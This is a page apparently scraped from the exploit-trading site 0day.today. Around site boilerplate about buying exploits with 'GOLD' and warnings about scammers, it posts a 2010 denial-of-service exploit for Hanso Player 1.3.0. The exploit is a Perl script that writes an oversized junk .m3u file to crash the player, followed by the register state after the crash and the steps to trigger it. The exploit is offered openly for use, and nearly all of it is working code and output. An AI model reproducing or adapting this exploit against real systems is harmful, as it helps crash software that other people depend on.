0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Hanso Player Version 1.3.0 (.m3u) Denial of Service
=================================================== Hanso Player Version 1.3.0 (.m3u) Denial of Service =================================================== # Exploit Title: Hanso Player Version 1.3.0 (.m3u) DoS # Date: 10/02/2010 # Author: xsploited security # Software Link: http://www.hansotools.com/downloads/hanso-player-setup.exe # Version: 1.3.0 # Tested on: Windows XP Pro SP3 # CVE : N/A ######################################################### #EAX 00000001 #ECX 80567B8E #EDX EDD619A0 #EBX 003E320C ASCII "h " #ESP 0103FF24 #EBP 0103FF58 #ESI 0103FF80 #EDI 001610D0 #EIP 7C90E460 ntdll.KiUserCallbackDispatcher #Process terminated, exit code C0000409 (-1073740791.) ######################################################### #!/usr/bin/perl my $file = "crash.m3u"; my $junk = "\x41" x 1337; open($FILE,">$file"); print $FILE $junk; print "\ncrash.m3u file created successfully\n1.) Open it with Hanso player\n2.) Application failure...\n"; close($FILE); # 0day.today [2024-11-16] #